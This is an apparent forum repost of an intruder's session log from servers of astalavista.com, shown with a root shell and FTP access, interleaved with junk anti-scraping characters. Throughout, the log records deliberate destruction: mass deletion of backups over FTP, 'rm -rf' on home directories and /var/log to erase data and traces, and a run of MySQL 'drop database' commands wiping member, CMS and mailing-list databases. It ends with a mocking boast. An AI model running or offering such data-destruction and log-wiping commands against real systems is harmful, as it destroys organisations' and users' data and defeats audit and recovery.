0 r- @7 z8 E- y2 C# h! D. D7 {ftp> ls -la& W0 i4 r7 _) k- O2 v9 J
227 Entering Passive Mode (212,254,194,163,2,189), V( d" K, f r# m6 }% u% k! j
150 Opening BINARY mode data connection for ‘file list’.
" J& F6 U4 B- e0 }-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar! B2 l: W- J ]! p0 P; }7 q o
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz25 E: _+ @$ B/ X8 e# H/ O0 e _
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
+ d" v: F: g# ]-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
* a/ n+ l% y& I" b8 F) a$ m: b$ b-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar/ X$ ?4 M$ j6 M' A# `0 K" A
[snip]
3 [% }8 i |* _$ W' F: S226 Transfer complete.
5 b7 C! O& D- Y! m7 e3 Rftp> mdelete *# o! v D3 q( A2 d
ftp> ls -la# M( c8 w+ j, J! A+ P
227 Entering Passive Mode (212,254,194,163,2,193)
7 y4 h( e, G! l* M& c; Y, W! ~8 i150 Opening BINARY mode data connection for ‘file list’.) o% T/ \- D4 A2 C& A5 F2 u
226 Transfer complete.5 x W; G, ]1 @. m$ w3 Y# s
ftp>
; K A, {/ M" ]; b K$ i9 k9 a' \& D9 o( B; J" w. a7 V' K3 i
sh-3.2# cd /home
! f- D% P' d6 i5 R: d/ Bsh-3.2# ls -la7 J& K1 c; O6 ~) k( W- e) g
total 120
/ o3 m/ t$ u9 c8 ]drwxr-xr-x 14 root root 4096 Mar 11 17:56 .; ~5 p& ]7 v; g1 P% l1 H& G9 ~
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..; |# I) t' ~; e5 P N& N/ j1 X
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin# c5 N2 X4 A' ^, I4 b8 ?
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
5 f; q$ }7 e$ o4 x8 w-rw——- 1 root root 8192 Jun 3 02:45 aquota.user7 {/ E! p- J1 L8 A& y& a
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
/ D2 S0 I7 h7 g. }drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
' I+ K7 U6 x' I( r6 u! b8 hdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
0 t- Y0 M+ [7 vdrwx–x–x 10 com com 4096 Apr 28 12:40 com2 a- _4 F2 P. o" W6 ^8 ]' W
drwxr-xr-x 2 root root 4096 May 17 2007 ftp8 Z$ N+ q7 D# @ n j5 b# g) R
drwx—— 3 jon jon 4096 Sep 21 2007 jon
- P: o) o, n2 p( t+ hdrwx—— 2 root root 16384 Sep 11 2007 lost+found: g4 y: b( ?% D
drwxr-xr-x 2 root root 4096 Sep 14 2007 my+ s' p3 _- I* S
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
/ T/ w8 i% r0 R( U% n) tdrwx—— 2 jon jon 4096 Sep 15 2007 test9 s( v( w) |. _, s
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp* q$ f- l9 C0 L0 M- e9 H
5 B4 o* [2 r/ l9 {, o. rsh-3.2# rm -rf backup/
7 x2 Y) s1 X- Y+ `6 Fsh-3.2# rm -rf backup.14161/
; }: d2 r6 I- G ]9 O0 {4 Y% N" fsh-3.2# rm -rf ftp/
: h, l8 F3 p6 N/ o7 A# Y. Vsh-3.2# rm -rf jon/
: W, A$ p* I5 V7 Q0 Esh-3.2# rm -rf my/
* e: r8 r! }5 b1 Rsh-3.2# rm -rf mysqldata/
0 a9 o1 G( {$ F" ]& _0 ash-3.2# rm -rf test/
. o. T$ Z& R4 @3 K0 Jsh-3.2# rm -rf tmp/
+ O( N( j6 y9 N3 R3 @' wsh-3.2# cd ~
0 {2 }6 S9 o8 wsh-3.2# rm -rf *8 F" i, h+ b# t7 I) G
sh-3.2# rm -rf /var/log/( R; v& @7 ^- Y3 v7 L6 v& m' K
rm: cannot remove directory `/var/log//proftpd’: Directory not empty5 y, ?, v0 l! Q _
sh-3.2# rm -rf /home/*& |/ r: E# f: Z3 n* V
sh-3.2# mysql
4 N, p, o( `7 j" I$ |0 G" uWelcome to the MySQL monitor. Commands end with ; or \g.
# ~1 ? O) X: m7 v8 _. e2 nYour MySQL connection id is 407156& O" f3 P- X3 j' D" h' O
Server version: 5.0.45-community-log MySQL Community Edition (GPL) m" D1 }& ?2 D
* ]7 z% S6 e" u& f3 _. ~# a4 n
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.4 w) ]- ]( `$ M
& N" S% K9 t+ \8 R) ?mysql> show databases;
9 C7 n% R: A* _4 M( x. s: l) d+———————–+0 q# t6 c V8 }$ u
| Database |
) i8 `( ~2 j1 t* Y4 U0 E' w0 n+———————–+, @' x' u5 o$ ~; O, n" E
| information_schema |
* o$ [# k7 v$ }3 F# p+ f! F, `| astanet_ads |- m3 H8 }1 R; @
| astanet_mailing_lists |2 S2 K9 C2 k: N$ o1 o* F
| astanet_mediawiki |
9 i* A/ p! }9 g: S+ {2 k| astanet_membersystem |
- a# ~9 o+ P6 p$ b/ |' g| com_contrexx |
; O# \! p1 G, E: a4 k% y| com_contrexx2 |
+ k" K; V# m& m, O9 v* N) X| com_contrexx2_live |
& G- f& T- _ V1 e! y" c| da_roundcube |
! C5 f. j) f9 J' v7 C; r& m| dolphin |
8 M1 c, _3 {9 F/ x: v2 ?| ideapool |% _9 B; Z1 R. ?# `' z
| mysql |
, I- J, T& }4 B- c$ y| test |
# G6 L2 e' B3 {1 b, s' y @* t| yourmaster |1 ?1 _0 y8 n6 l
+———————–+! X' m! p& k6 t9 G' K9 P+ x7 h# Z2 }
14 rows in set (0.03 sec)0 s R& h+ t4 \& t! c$ w0 p% Y9 d, L
( ~6 Q y5 L9 u8 W' _8 a# kmysql> drop database astanet_membersystem;
8 {1 |% t, k& O, z2 q. K) HdroQuery OK, 46 rows affected (0.81 sec)
5 p6 w* o3 w1 \( N9 q+ M# y5 O
6 c9 G5 G8 g& H3 N6 s) c% e. {mysql> drop database com_contrexx;* X* A( F2 z+ O2 p0 _- B% G9 W
Query OK, 211 rows affected (2.72 sec). W, t0 M- |' I3 Q- E
* d9 J* i* W* V9 Q0 @: U( {+ ]2 i
mysql> drop database com_contrexx2;
5 W8 l8 a- H" `3 M- CQuery OK, 237 rows affected (2.23 sec)
! C5 Q( `5 X1 h z
1 |) I+ n7 j0 m& x1 A6 Imysql> drop database com_contrexx2_live;
9 I: {+ O' P3 XQuery OK, 227 rows affected (7.63 sec)
C! k4 Z0 Q3 n) J3 O" z# W- q4 }/ l O1 S' ~; o, S
mysql> drop database ideapool;6 J n( l" H& f6 a5 j( C6 a; l/ N" l
Query OK, 69 rows affected (0.19 sec)& Z: v6 I7 e/ B( h5 z" A5 c- h
" Z5 r$ ~3 n- T& e$ O# ^) Imysql> drop database yourmaster;2 h$ B, r6 O! p: i7 V7 v
Query OK, 158 rows affected (0.55 sec)" j: @$ R6 s* ~; g+ s# x: m
1 x; ]+ t; U( ?+ B! r0 D7 x! I
mysql> drop database astanet_ads;
/ m6 s8 u$ z6 _. }Query OK, 9 rows affected (0.11 sec)( B8 }, ]8 X. R3 E5 j {+ E# c, i) }
/ ^) [1 `& q7 U, g1 ?/ O8 S9 c( vmysql> drop database astanet_mailing_lists;
+ t! V1 ^/ K% @: e) { K: KQuery OK, 24 rows affected (1.47 sec)
. q! `/ P, K( w/ G
3 c6 m7 |% k% D! s7 t+ K( y( t7 _mysql> drop database astanet_mediawiki;
2 v0 J2 j1 s5 b" C5 I ~) {Query OK, 31 rows affected (0.51 sec)
/ q- E. I1 q/ S1 U* a) l4 P5 m: u: O% }+ B
mysql> show databases;
5 I" w, g: b8 P+ t/ K+——————–+. {7 H/ u% X6 w9 \- C* x M, r
| Database |
% G# v2 n4 k" v4 r3 b+——————–+
8 ]& q3 @8 w" S q* a| information_schema |+ f: L5 K* p+ l" h+ g
| da_roundcube |
3 p' P. b" i0 u2 |6 S8 T8 B! p| dolphin |8 u' h9 w8 j, }
| mysql |& Z- h4 r: A9 t- f
| test |
0 S2 C& |0 K( Y) ?# a$ I+——————–+
1 Z5 L/ |# N( W: o9 |( ?( O( R5 rows in set (0.00 sec)4 \3 b. ^; V5 f" e. |" u7 U5 C
( D! X" Y' J# H6 v3 G4 k6 X
What a journey! We’re not sure exactly why the “Terminator” had any influence on6 F: P( H; o0 q; n7 ?
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
" p2 m" O- k* Z: N e' _wrong to say this pack of morons *wont be back*.- C; y" \; V. h. ^$ H5 v
|
发表于 2012-11-6 21:07:34
收藏
支持
反对